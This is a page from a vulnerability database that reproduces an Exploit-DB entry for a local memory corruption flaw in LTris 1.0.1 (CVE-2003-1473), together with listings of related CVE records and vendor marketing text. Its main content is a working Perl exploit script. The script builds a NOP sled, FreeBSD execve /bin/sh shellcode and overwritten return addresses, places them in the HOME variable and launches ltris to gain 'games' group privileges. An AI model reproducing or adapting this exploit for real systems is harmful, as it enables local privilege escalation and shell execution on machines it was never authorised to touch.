Lucene search
+L

Lgames LTris 1.0.1 - Local Memory Corruption

🗓️ 09 May 2003 00:00:00Reported by Knud Erik HojgaardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

LTris 1.0.1 vulnerability allows local attackers to gain group privileges via memory corruption.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1473
24 Oct 200723:00
cve
cvelist
Cvelist
CVE-2003-1473
24 Oct 200723:00
cvelist
euvd
EUVD
EUVD-2003-1463
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1473
31 Dec 200305:00
nvd
source: https://www.securityfocus.com/bid/7537/info

A memory corruption vulnerability has been reported for LTris that may result in a local attacker obtaining group 'games' privileges.

#!/usr/bin/perl
$len = 520;
$ret = 0xbfbff825;
$nop = "\x90";
$offset = 0;
$shellcode =    "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56". #freebsd 29 bytes
                "\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f". #execve /bin/sh
                "\x62\x69\x6e\x2f\x73\x68\x23";                 #zillionATsafemode.org

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}
local($ENV{'HOME'}) = $buffer;
exec("ltris 2>/dev/null");

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.00925
36